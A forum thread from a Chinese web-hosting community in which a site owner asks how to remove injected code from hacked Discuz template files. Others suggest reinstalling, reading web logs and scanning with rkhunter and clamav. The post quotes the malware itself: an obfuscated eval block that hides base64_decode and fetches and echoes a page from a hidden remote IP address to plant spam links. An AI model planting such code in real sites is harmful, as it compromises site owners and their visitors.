全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

IP归属甄别会员请立即修改密码
查看: 1330|回复: 11
打印 上一主题 下一主题

大佬们,这个马在哪儿哪儿清除?

[复制链接]
跳转到指定楼层
1#
发表于 2018-1-4 13:19:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
模版文件下多了这些
  1. <!--{eval}-->
  2. <!--
  3. if(!$_SERVER['QUERY_STRING']){
  4.         $vars = 'b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e';
  5.         echo file_get_contents($vars("aHR0cDovLzE4My42MC4xMTEuMTczOjgwODAvbGluay9nYmsuaHRtbA=="));
  6. }
  7. -->
  8. <!--{/eval}-->
复制代码


DZ论坛被挂黑链,同VPS另一个网站也被挂,root用户早已经改了端口号
您好,请联系您的程序人员检查一下网站代码是否存在漏洞,这边不是程序人员,无法协助您操作,请见谅!为了更好的为您提供优质的服务,烦请您在百忙之中抽空对该工单做出评价,感谢您的配合!
2#
发表于 2018-1-4 13:25:12 | 只看该作者
找个软件可以批量清除 。。。几秒就搞定了。。。
3#
 楼主| 发表于 2018-1-4 13:37:17 | 只看该作者
leaveoff 发表于 2018-1-4 13:25
找个软件可以批量清除 。。。几秒就搞定了。。。

删这行没问题而且很简单,不知道是从哪儿来的,删了再被加上
4#
发表于 2018-1-4 13:48:16 | 只看该作者
重装。

被挂rootkit的话,没有其他办法。。。
5#
发表于 2018-1-4 13:53:17 | 只看该作者
你是怎么发现的
6#
 楼主| 发表于 2018-1-4 13:59:47 | 只看该作者
我是人 发表于 2018-1-4 13:48
重装。

被挂rootkit的话,没有其他办法。。。

我是说我早已经把自己的端口改了,挂马的人似乎不是通过root进去的
7#
发表于 2018-1-4 15:30:49 | 只看该作者
看web日志是如何被黑的
8#
 楼主| 发表于 2018-1-4 17:02:05 | 只看该作者
删了又自动生成
9#
发表于 2018-1-4 18:54:04 | 只看该作者
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描
安装个clamav进行扫描
10#
 楼主| 发表于 2018-1-8 15:41:29 | 只看该作者
Ruclinux 发表于 2018-1-4 18:54
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描

这两个有小白文档没?前两天恢复了镜像不到一天又被日了
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-9-8 19:40 , Processed in 0.065080 second(s), 9 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表